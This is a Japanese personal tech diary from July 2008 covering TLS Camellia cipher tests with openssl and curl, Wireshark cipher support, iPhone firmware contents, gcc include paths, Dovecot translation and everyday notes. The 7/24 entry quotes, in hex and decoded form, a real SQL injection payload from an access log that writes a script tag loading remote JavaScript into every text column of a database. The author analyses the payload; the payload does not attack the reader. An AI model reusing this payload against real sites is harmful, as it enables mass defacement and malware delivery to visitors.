a2UgVG93bjEXMBUGA1UEChMOU25ha2UgT2lsLCBMdGQxFzAVBgNVBAsTDldlYnNl cnZlciBUZWFtMRkwFwYDVQQDExB3d3cuc25ha2VvaWwuZG9tMR8wHQYJKoZIhvcN AQkBFhB3d3dAc25ha2VvaWwuZG9tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKB gQC554Ro+VH0dJONqljPBW+C72MDNGNy9eXnzejXrczsHs3Pc92Vaat6CpIEEGue yG29xagb1o7Gj2KRgpVYcmdx6tHd2JkFW5BcFVfWXL42PV4rf9ziYon8jWsbK2aE +L6hCtcbxdbHOGZdSIWZJwc/1Vs70S/7ImW+Zds8YEFiAwIDAQABo24wbDAbBgNV HREEFDASgRB3d3dAc25ha2VvaWwuZG9tMDoGCWCGSAGG+EIBDQQtFittb2Rfc3Ns IGdlbmVyYXRlZCBjdXN0b20gc2VydmVyIGNlcnRpZmljYXRlMBEGCWCGSAGG+EIB AQQEAwIGQDANBgkqhkiG9w0BAQQFAAOBgQB6MRsYGTXUR53/nTkRDQlBdgCcnhy3 hErfmPNl/Or5jWOmuufeIXqCvM6dK7kW/KBboui4pffIKUVafLUMdARVV6BpIGMI 5LmVFK3sgwuJ01v/90hCt4kTWoT8YHbBLtQh7PzWgJoBAY7MJmjSguYCRt91sU4K s0dfWsdItkw4uQ== -----END CERTIFICATE----- subject=/C=XY/ST=Snake Desert/L=Snake Town/O=Snake Oil, Ltd/OU=Webserver Team/C N=www.snakeoil.dom/emailAddress=www@snakeoil.dom issuer=/C=XY/ST=Snake Desert/L=Snake Town/O=Snake Oil, Ltd/OU=Certificate Autho rity/CN=Snake Oil CA/emailAddress=ca@snakeoil.dom --- No client certificate CA names sent --- SSL handshake has read 1390 bytes and written 265 bytes --- New, TLSv1/SSLv3, Cipher is DHE-RSA-CAMELLIA256-SHA Server public key is 1024 bit Compression: NONE Expansion: NONE SSL-Session: Protocol : TLSv1 Cipher : DHE-RSA-CAMELLIA256-SHA Session-ID: BDF60DA4AFFF73A711D6F0544AB1D3BA122C3939FEE8DBC010B14D9F49CD1F9 7 Session-ID-ctx: Master-Key: ED6D1A73738505C4ABF42A0AC996F7FCE1675EB52C79ECBDC2782B46E9609FB 21AFF3D0511249AA02851499B70DA9A53 Key-Arg : None Krb5 Principal: None Start Time: 1215498128 Timeout : 300 (sec) Verify return code: 21 (unable to verify the first certificate) --- GET / <html></html>closed なんか、妙に感動。curl でも試してみた。 [toyota@dstar]% setenv LD_LIBRARY_PATH /home/toyota/lib:/usr/lib [toyota@dstar]% curl -k --ciphers 'CAMELLIA' https://localhost/index.html <html></html> 良い感じである。 7/10 Network WWW https での CAMELLIA 暗号を使った通信、wireshark では解読してくれない。 もちろん、DH 系は無理として、CAMELLIA128-SHA / CAMELLIA256-SHA の2つは 解読してくれても良いはずである。試しに、ssldump をゴニョゴニョいじって make し直したものは、解読できた。ちょっと wireshark の source の判定部分 epan/dissectors/packet-ssl-utils.c を見てみると。 /* look in openssl/ssl/ssl_lib.c for a complete list of available cipersuite*/ static SslCipherSuite cipher_suites[]={ {1,KEX_RSA,SIG_RSA,ENC_NULL,0,0,0,DIG_MD5,16,0, SSL_CIPHER_MODE_STREAM}, {2,KEX_RSA,SIG_RSA,ENC_NULL,0,0,0,DIG_SHA,20,0, SSL_CIPHER_MODE_STREAM}, {3,KEX_RSA,SIG_RSA,ENC_RC4,1,128,40,DIG_MD5,16,1, SSL_CIPHER_MODE_STREAM}, {4,KEX_RSA,SIG_RSA,ENC_RC4,1,128,128,DIG_MD5,16,0, SSL_CIPHER_MODE_STREAM}, {5,KEX_RSA,SIG_RSA,ENC_RC4,1,128,128,DIG_SHA,20,0, SSL_CIPHER_MODE_STREAM}, {6,KEX_RSA,SIG_RSA,ENC_RC2,8,128,40,DIG_SHA,20,1, SSL_CIPHER_MODE_STREAM}, {7,KEX_RSA,SIG_RSA,ENC_IDEA,8,128,128,DIG_SHA,20,0, SSL_CIPHER_MODE_STREAM}, {8,KEX_RSA,SIG_RSA,ENC_DES,8,64,40,DIG_SHA,20,1, SSL_CIPHER_MODE_CBC}, {9,KEX_RSA,SIG_RSA,ENC_DES,8,64,64,DIG_SHA,20,0, SSL_CIPHER_MODE_CBC}, {10,KEX_RSA,SIG_RSA,ENC_3DES,8,192,192,DIG_SHA,20,0, SSL_CIPHER_MODE_CBC}, {11,KEX_DH,SIG_DSS,ENC_DES,8,64,40,DIG_SHA,20,1, SSL_CIPHER_MODE_STREAM}, {12,KEX_DH,SIG_DSS,ENC_DES,8,64,64,DIG_SHA,20,0, SSL_CIPHER_MODE_STREAM}, {13,KEX_DH,SIG_DSS,ENC_3DES,8,192,192,DIG_SHA,20,0, SSL_CIPHER_MODE_STREAM}, {14,KEX_DH,SIG_RSA,ENC_DES,8,64,40,DIG_SHA,20,1, SSL_CIPHER_MODE_STREAM}, {15,KEX_DH,SIG_RSA,ENC_DES,8,64,64,DIG_SHA,20,0, SSL_CIPHER_MODE_STREAM}, {16,KEX_DH,SIG_RSA,ENC_3DES,8,192,192,DIG_SHA,20,0, SSL_CIPHER_MODE_STREAM}, {17,KEX_DH,SIG_DSS,ENC_DES,8,64,40,DIG_SHA,20,1, SSL_CIPHER_MODE_STREAM}, {18,KEX_DH,SIG_DSS,ENC_DES,8,64,64,DIG_SHA,20,0, SSL_CIPHER_MODE_STREAM}, {19,KEX_DH,SIG_DSS,ENC_3DES,8,192,192,DIG_SHA,20,0, SSL_CIPHER_MODE_STREAM}, {20,KEX_DH,SIG_RSA,ENC_DES,8,64,40,DIG_SHA,20,1, SSL_CIPHER_MODE_STREAM}, {21,KEX_DH,SIG_RSA,ENC_DES,8,64,64,DIG_SHA,20,0, SSL_CIPHER_MODE_STREAM}, {22,KEX_DH,SIG_RSA,ENC_3DES,8,192,192,DIG_SHA,20,0, SSL_CIPHER_MODE_STREAM}, {23,KEX_DH,SIG_NONE,ENC_RC4,1,128,40,DIG_MD5,16,1, SSL_CIPHER_MODE_STREAM}, {24,KEX_DH,SIG_NONE,ENC_RC4,1,128,128,DIG_MD5,16,0, SSL_CIPHER_MODE_STREAM}, {25,KEX_DH,SIG_NONE,ENC_DES,8,64,40,DIG_MD5,16,1, SSL_CIPHER_MODE_STREAM}, {26,KEX_DH,SIG_NONE,ENC_DES,8,64,64,DIG_MD5,16,0, SSL_CIPHER_MODE_STREAM}, {27,KEX_DH,SIG_NONE,ENC_3DES,8,192,192,DIG_MD5,16,0, SSL_CIPHER_MODE_STREAM}, {47,KEX_RSA,SIG_RSA,ENC_AES,16,128,128,DIG_SHA,20,0, SSL_CIPHER_MODE_CBC}, {53,KEX_RSA,SIG_RSA,ENC_AES256,16,256,256,DIG_SHA,20,0, SSL_CIPHER_MODE_CBC}, {96,KEX_RSA,SIG_RSA,ENC_RC4,1,128,56,DIG_MD5,16,1, SSL_CIPHER_MODE_STREAM}, {97,KEX_RSA,SIG_RSA,ENC_RC2,1,128,56,DIG_MD5,16,1, SSL_CIPHER_MODE_STREAM}, {98,KEX_RSA,SIG_RSA,ENC_DES,8,64,64,DIG_SHA,20,1, SSL_CIPHER_MODE_STREAM}, {99,KEX_DH,SIG_DSS,ENC_DES,8,64,64,DIG_SHA,16,1, SSL_CIPHER_MODE_STREAM}, {100,KEX_RSA,SIG_RSA,ENC_RC4,1,128,56,DIG_SHA,20,1, SSL_CIPHER_MODE_STREAM}, {101,KEX_DH,SIG_DSS,ENC_RC4,1,128,56,DIG_SHA,20,1, SSL_CIPHER_MODE_STREAM}, {102,KEX_DH,SIG_DSS,ENC_RC4,1,128,128,DIG_SHA,20,0, SSL_CIPHER_MODE_STREAM}, {-1, 0,0,0,0,0,0,0,0,0, 0} }; #define MAX_BLOCK_SIZE 16 #define MAX_KEY_SIZE 32 int ssl_find_cipher(int num,SslCipherSuite* cs) { SslCipherSuite *c; for(c=cipher_suites;c->number!=-1;c++){ if(c->number==num){ *cs=*c; return 0; } } return -1; } な感じである。KEX_DH は解読できないので、実質、 1 0x0001 TLS_RSA_WITH_NULL_MD5 2 0x0002 TLS_RSA_WITH_NULL_SHA 3 0x0003 TLS_RSA_EXPORT_WITH_RC4_40_MD5 4 0x0004 TLS_RSA_WITH_RC4_128_MD5 5 0x0005 TLS_RSA_WITH_RC4_128_SHA 6 0x0006 TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 7 0x0007 TLS_RSA_WITH_IDEA_CBC_SHA 8 0x0008 TLS_RSA_EXPORT_WITH_DES40_CBC_SHA 9 0x0009 TLS_RSA_WITH_DES_CBC_SHA 10 0x000a TLS_RSA_WITH_3DES_EDE_CBC_SHA 47 0x002f TLS_RSA_WITH_AES_128_CBC_SHA 53 0x0035 TLS_RSA_WITH_AES_256_CBC_SHA 96 0x0060 TLS_RSA_EXPORT1024_WITH_RC4_56_MD5 97 0x0061 TLS_RSA_EXPORT1024_WITH_RC2_CBC_56_MD5 98 0x0062 TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA 100 0x0064 TLS_RSA_EXPORT1024_WITH_RC4_56_SHA の 16 cipher しかない。この source 部分をいじれば CAMELLIA 対応になるか、 というとそうでもなく、based on GNUTLS なので、GNUTLS から CAMELLIA 対応に して、作り直しになる。GNUTLS の source を見てないのでなんとも言えないけど CAMELLIA は対応しているようなので、解読はできるのだろうけど、ひょっとしたら based on libgcrypt なので、libgcrypt からコンパイルのし直しかもしれない。 と考えると気が遠くなってきたので、wireshark の作り直しなんて考えるのは やめよう。 7/11 Network WWW ssldump 用 AES/CAMELLIA/SEED 対応 patch を作ってみた。まとめのページも 書き換えないと。 7/12 Other バイクのリアサスペンションの袋ナットが欠落していた。ま、それでも違和感を 感じつつ帰ってこれたのだけど。で、ホームセンターに行って、同じ大きさの 袋ナットを買ったのだけど…。家に帰って入れてみたらうまく入らない。どうやら ピッチが合わないようである。バイクの M10 以上は...なんて思い出した。多分、 ホームセンターで買ってきたのは 1.5 ピッチ、バイクのは 1.25 ピッチなんで しょう。仕方なく、純正部品を注文しに行く。ゴミになろうとしている 88円の 袋ナットの画期的な使い方を発明しなければ。 7/13 WWW 一般の人は、Yahoo の web メールなんかが接続元の IP をメールヘッダに付ける ことを知らないようで。どこからアクセスしたのか知らせると、気持ち悪がられ たりして。まぁ、無知というのも問題だけど、危険性を知らせていないことも 問題なんだろうなぁ、なんて思う。探せばどこかに書いてあるかもしれないけど。 7/14 WWW https での TLS 1.1 のプロトコルの確認をしたいのだけど、対応しているサーバが ない。https://gmail.com/ とか https://www.yahoo.co.jp/ とか接続して試して みたけど、TLS 1.1 どころか TLS 1.0 さえ対応していない。手元の Apache で、 TLS 1.0 の確認はできたのだけど、TLS 1.1 は世の中的にまだまだ先の話のようで ある。 7/15 Network Other 世の中 iPhone で騒がれているようで。ちょっと調べてたら、ファームウェアが ダウンロードできるみたいで、早速ダウンロードしてみた。それにしても、225M もあるなんて。そもそもこのファームも、微妙に公式じゃないみたいで、設定を 初期状態に戻すと 5A345 から 5A347 になる 5A347 の方。このファイル、zip で 圧縮されていて、解凍したファイルの日付を見ると、6/26 になっているので、 次のロットからは標準でこのバージョンになるんじゃないかな。とりあえず、 中身は。 [toyota@zonama]% tree . |-- 018-3782-2.dmg |-- 018-3783-2.dmg |-- Firmware | |-- all_flash | | |-- all_flash.m68ap.production | | | |-- DeviceTree.m68ap.img3 | | | |-- LLB.m68ap.RELEASE.img3 | | | |-- applelogo.s5l8900x.img3 | | | |-- batterylow0.s5l8900x.img3 | | | |-- batterylow1.s5l8900x.img3 | | | |-- glyphcharging.s5l8900x.img3 | | | |-- glyphplugin.s5l8900x.img3 | | | |-- iBoot.m68ap.RELEASE.img3 | | | |-- manifest | | | |-- needservice.s5l8900x.img3 | | | `-- recoverymode.s5l8900x.img3 | | `-- all_flash.n82ap.production | | |-- DeviceTree.n82ap.img3 | | |-- LLB.n82ap.RELEASE.img3 | | |-- applelogo.s5l8900x.img3 | | |-- batterylow0.s5l8900x.img3 | | |-- batterylow1.s5l8900x.img3 | | |-- glyphcharging.s5l8900x.img3 | | |-- glyphplugin.s5l8900x.img3 | | |-- iBoot.n82ap.RELEASE.img3 | | |-- manifest | | |-- needservice.s5l8900x.img3 | | `-- recoverymode.s5l8900x.img3 | `-- dfu | |-- WTF.m68ap.RELEASE.dfu | |-- WTF.n82ap.RELEASE.dfu | |-- WTF.s5l8900xall.RELEASE.dfu | |-- iBEC.m68ap.RELEASE.dfu | |-- iBEC.n82ap.RELEASE.dfu | |-- iBSS.m68ap.RELEASE.dfu | `-- iBSS.n82ap.RELEASE.dfu |-- Restore.plist `-- kernelcache.release.s5l8900x 5 directories, 33 files 7/16 Network Other 昨日の続き。ファイルの中身やファイル名に散見される S5L8900 というのは、 Samsung 社製のアプリケーションプロセッサの名前で、コアは ARM1176JZF-S と なっているらしい。ファイルの中身を見る限り、液晶は SHARP TMD SAMSUNG AUO の4つ対応している。実際に採用されているのは、どこのかは知らないけど。 なんだか、頑張ればファームの書き換えぐらい出来そうな気がしてきた。それは すごいスキルをもったマニアに譲るけど。実機もってないし。 7/17 Network WWW iPhone 3G の HTTP ヘッダを見てみた。 GET / HTTP/1.1 User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_0 like Mac OS X; ja-jp) App leWebKit/525.18.1 (KHTML, like.Gecko) Version/3.1.1 Mobile/5A345 Safari/525.20 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/pla in;q=0.8,image/png,*/*;q=0.5 Accept-Language: ja-jp Accept-Encoding: gzip, deflate Connection: keep-alive Host: www.tatsuyoshi.net 固体識別番号の類は一切無し。このシンプルさは好きな方だけど、解析する方の 立場だと、何か送って欲しいものである。 7/18 Linux Segmentation Fault しているプログラムがあって、core ファイルを見ながら デバッグ。ポインタを多用していると、呼び出し元の関数内の変数を見ても、 呼び出している時点のものではないので、やっぱり動かしながらのデバッグの 方がずっと楽だなぁ、なんて思う。もうしばらく格闘しないと、解決しそうに ない。ちょっと気が重い。 7/19 Other 先週大きさを間違えて買った袋ナット。バイク屋に頼んでいたのが来ていたので 取りに行き、早速取り付け。ついでに、各所のネジの緩みを確認。キャリア周りで ちょくちょく緩んでいたので、これで安心して走ることができる。この作業を、 先月買った KTC の MCK317 の工具セットで行った。工具自体は問題ないけど、 10mm のヘキサゴンと、19mm の六角ナットを回せるソケットかレンチがあれば 完璧かな、と思った。 7/20 Linux リトルエンディアンの文字列を、並び替えたい。それも、vi で。 0x1234abcd を、cdab3412 にしたい。とりあえず、面倒そうな 0x は削除。 :%s/^0x// で、並び替え。perl だと $1 とかを使うんだけど、色々試してみて、こうなった。 :%s/^\([0-9a-f][0-9a-f]\)\([0-9a-f][0-9a-f]\)\([0-9a-f][0-9a-f]\)\([0-9a-f][0-9 a-f]\)$/\4\3\2\1/ 長いので2行にしたけど、こんな感じでうまくいった。vi も慣れれば使えるな、 と思った。 7/21 PowerEdge SC430 PC の電源を1日中入れっぱなしなのだけど、この暑さの中、昼は結構な感じで ケースファンが回っていることに気がついた。平日はさらに窓を閉め切っている ので、温度があがっているだろうし。帰ってブラウザを立ち上げなおしたり、 書きかけの文書が残っていたりしているので、つけっぱなしなのだけど、この ご時勢なんで、こまめに電源を落とすようにしようかな。 7/22 Linux Segmentation Fault しているプログラムのデバッグ。こんなときは、やっぱり アセンブラをきちんとやっておけば良かったと思う。レジスタとか、スタックとか ちゃんと理解できれば、少しは楽なんだろうなぁ…。 7/23 Linux ちょっと Apache 周りのモジュールをいじっていたりするのだけど、Red Hat 7.2 とか、20世紀の Apache とか、使われている所では使われているもんなんだな、 なんて思いながら、対応したりして。ま、それだけ安定している、ということ なのだろうけど、これだけ古いと、shell script で変なコマンド叩けないよなぁ。 pgrep とかあるのかわからないし。 7/24 WWW おかしなアクセスがやってきた。改行を入れているけど。 210.245.51.207 - - [24/Jul/2008:06:13:37 +0900] "GET /toyota/router/?;DECLARE%2 0@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420766172636861722832353529 2C40432076617263686172283430303029204445434C415245205461626C655F437572736F72204 35552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D20737973 6F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E6964206 16E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E787479 70653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F504 54E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F43 7572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302 920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B 275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D2268747 4703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727 20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73637 2697074207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F73 63726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F43757 2736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F722044 45414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/ 1.0" 200 8044 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 送信元はベトナムっぽい。ASCII に直してみた。 DECLARE @S CHAR(4000);SET @S=CAST(DECLARE @T varchar(255),@C varchar(4000) DECL ARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 o r b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE (@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></titl e><script src="http://abc.verynx.cn/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.verynx.cn/w.js"></script><!--''')FETCH NE XT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S); 流行の SQL インジェクションみたい。http://abc.verynx.cn/w.js というファイルを 取りに行っているようなのだけど、abc.verynx.cn を lookup すると 127.0.0.1 が 返ってくる。 Name: abc.verynx.cn Address: 127.0.0.1 誰か気がついて DNS 変えられたのかな。 7/25 WWW 久しぶりに、というか2年ぶり近くで、トップページの更新をしてみた。ここの ところ、全く BBルータ解剖 を行っていないなぁ。m/c なページも更新してないし。 Dovecot の翻訳も止まって、なんだか中途半端な状態だなぁ。少しずつ、なんとか していこう。 7/26 Other 六会コンクリートの話題、全然ニュースで見かけないので、調べてみることに した。というか、実家のマンションが、距離的に六会コンクリートから30分以内の 場所にあるので、心配なだけ。で、ポップアウト現象とか、骨材のことを色々 調べていたのだけど、国土交通省の反応も遅いし、親会社の住友大阪セメントの 対応も「当社に法的責任はない」とかだし。なんだかなぁ、という状況である。 建築業界の不祥事って、報道が小さいところからして、どこからか大きな力が 働いているのでしょう。 7/27 Other どこでもベープ蚊取り、の電池(薬剤も?)が切れたようなので、交換した。ついでに 分解して写真にとったので、別ページに。フマキラーの電池は、初めて見た。 7/28 Network Dovecot 1.1.2 がリリースされていたことをすっかり見落としていた。とりあえず、 Dovecot のページの更新をした。実は dovecot.conf の翻訳もしていて、半分ほど 終わっているので、近々アップする予定。 7/29 Network dovecot 1.1.2 の dovecot-example.conf の翻訳をざっくりと終わらせたので、 アップしておいた。1.1.1 からの変更点はほとんど無しなんだけど。 7/30 Linux 手元の Linux 環境には openssl が2つ入っている。OS 標準のものと、後から 入れたもの。後から入れたものは /usr/local 以下に入っているので、衝突せずに 動作させられるのだけど、ちょっと気になることが。openssl のライブラリを 使うものをコンパイルするとき、-L/usr/local/lib オプションを付けないと、 [toyota@dstar]% gcc -lssl -o test test.c ccg8Q6Tn.o(.text+0x8): In function `ssl_test': test.c:10: undefined reference to `EVP_Cipher' collect2: ld returned 1 exit status な感じ。-L/usr/local/lib を付けると、問題なくコンパイルできるのだけど、 あえて古い openssl を使いたい、と。多分、問題は /usr/local/include/openssl 以下を読みに行って、それに対応する /usr/local/lib 以下の libssl.a が必要 なのでしょう。試しに、gcc で -v オプションを付けると。 ignoring nonexistent directory "/usr/i386-redhat-linux/include" #include "..." search starts here: #include <...> search starts here: /usr/local/include /usr/lib/gcc-lib/i386-redhat-linux/3.2.3/include /usr/include End of search list. と、/usr/include より前に /usr/local/include を読みに行っている。gcc に -I- オプションを付けて指定しても結果が同じだったので、-nostdinc を付けて 解決することにした。 [toyota@dstar]% gcc -lssl -nostdinc -I/usr/include -I/usr/lib/gcc-lib/i386-redh at-linux/3.2.3/include -o test test.c こんな感じで、なんとかおさまった。gcc が勝手に /usr/local/include を読みに 行っている設定って、どこかのファイルにあるものなのかなぁ…。 7/31 Network dovecot 1.1.2 の doc 以下をざっくりと翻訳。やっと、1.1.2 の翻訳が、少し それらしくなってきた。いつものようにdovecot.jpに
21st projects Tatsuyoshi Networks Prompt Works
by Tatsuyoshi since 2003